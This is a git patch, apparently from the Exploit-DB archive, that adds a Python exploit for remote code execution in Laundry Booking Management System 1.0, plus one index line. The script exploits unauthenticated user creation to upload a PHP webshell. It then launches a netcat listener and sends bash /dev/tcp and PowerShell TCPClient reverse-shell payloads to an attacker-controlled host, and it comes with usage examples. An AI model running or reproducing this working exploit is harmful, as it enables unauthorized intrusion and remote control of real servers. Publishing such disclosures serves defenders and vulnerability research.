From ebf638ee1a3c4150078f3f82ec5d5e732184a1a8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 1 Dec 2021 05:02:07 +0000 Subject: [PATCH] DB: 2021-12-01 1 changes to exploits/shellcodes Laundry Booking Management System 1.0 - Remote Code Execution (RCE) --- exploits/php/webapps/50556.py | 135 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 136 insertions(+) create mode 100755 exploits/php/webapps/50556.py diff --git a/exploits/php/webapps/50556.py b/exploits/php/webapps/50556.py new file mode 100755 index 000000000..c01411073 --- /dev/null +++ b/exploits/php/webapps/50556.py @@ -0,0 +1,135 @@ +# Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE) +# Date: 29/11/2021 +# Exploit Author: Pablo Santiago +# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip +# Version: 1.0 +# Tested on: Windows 7 and Ubuntu 21.10 + +# Vulnerability: Its possible create an user without being authenticated, +# in this request you can upload a simple webshell which will used to get a +# reverse shell + +import re, sys, argparse, requests, time, os +import subprocess, pyfiglet + +ascii_banner = pyfiglet.figlet_format("Laundry") +print(ascii_banner) +print(" Booking Management System\n") +print("----[Broken Access Control to RCE]----\n") + + +class Exploit: + + def __init__(self,target, shell_name,localhost,localport,os): + + self.target=target + self.shell_name=shell_name + self.localhost=localhost + self.localport=localport + self.LHL= '/'.join([localhost,localport]) + self.HPW= "'"+localhost+"'"+','+localport + self.os=os + self.session = requests.Session() + #self.http_proxy = "http://127.0.0.1:8080" + #self.https_proxy = "https://127.0.0.1:8080" + #self.proxies = {"http" : self.http_proxy, + # "https" : self.https_proxy} + + self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'} + + def create_user(self): + + url = self.target+"/pages/save_user.php" + data = { + "fname":"bypass", + "email":"bypass@bypass.com", + "password":"password", + "group_id": "2", + + } + + #Creates user "bypass" and upload a simple webshell without +authentication + request = self.session.post(url, +data=data,headers=self.headers,files={"image":(self.shell_name ++'.php',"")}) + time.sleep(3) + if (request.status_code == 200): + print('[*] The user and webshell were created\n') + else: + print('Something was wront...!') + + def execute_shell(self): + if self.os == "linux": + time.sleep(3) + print("[*] Starting reverse shell\n") + subprocess.Popen(["nc","-nvlp", self.localport]) + time.sleep(3) + + #Use a payload in bash to get a reverse shell + payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"' + execute_command = +self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload + + try: + request_rce = requests.get(execute_command) + print(request_rce.text) + + except requests.exceptions.ReadTimeout: + pass + + elif self.os == "windows": + time.sleep(3) + print("[*] Starting reverse shell\n") + subprocess.Popen(["nc","-nvlp", self.localport]) + time.sleep(3) + + #Use a payload in powershell to get a reverse shell + payload = +"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0) +{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" + execute_command = +self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload + + + try: + request_rce = requests.get(execute_command) + print(request_rce.text) + + except requests.exceptions.ReadTimeout: + pass + + else: + print('Windows or linux') + + +def get_args(): + parser = argparse.ArgumentParser(description='Laundry Booking +Management System') + parser.add_argument('-t', '--target', dest="target", required=True, +action='store', help='Target url') + parser.add_argument('-s', '--shell_name', dest="shell_name", +required=True, action='store', help='shell_name') + parser.add_argument('-l', '--localhost', dest="localhost", +required=True, action='store', help='local host') + parser.add_argument('-p', '--localport', dest="localport", +required=True, action='store', help='local port') + parser.add_argument('-os', '--os', choices=['linux', 'windows'], +dest="os", required=True, action='store', help='linux,windows') + args = parser.parse_args() + return args + +args = get_args() +target = args.target +shell_name = args.shell_name +localhost = args.localhost +localport = args.localport + + +xp = Exploit(target, shell_name,localhost,localport,args.os) +xp.create_user() +xp.execute_shell() + +#Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows +#Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 95bc3143d..f5ce15abe 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44644,3 +44644,4 @@ id,file,description,date,author,type,platform,port 50553,exploits/multiple/webapps/50553.txt,"orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple, 50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple, 50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php, +50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,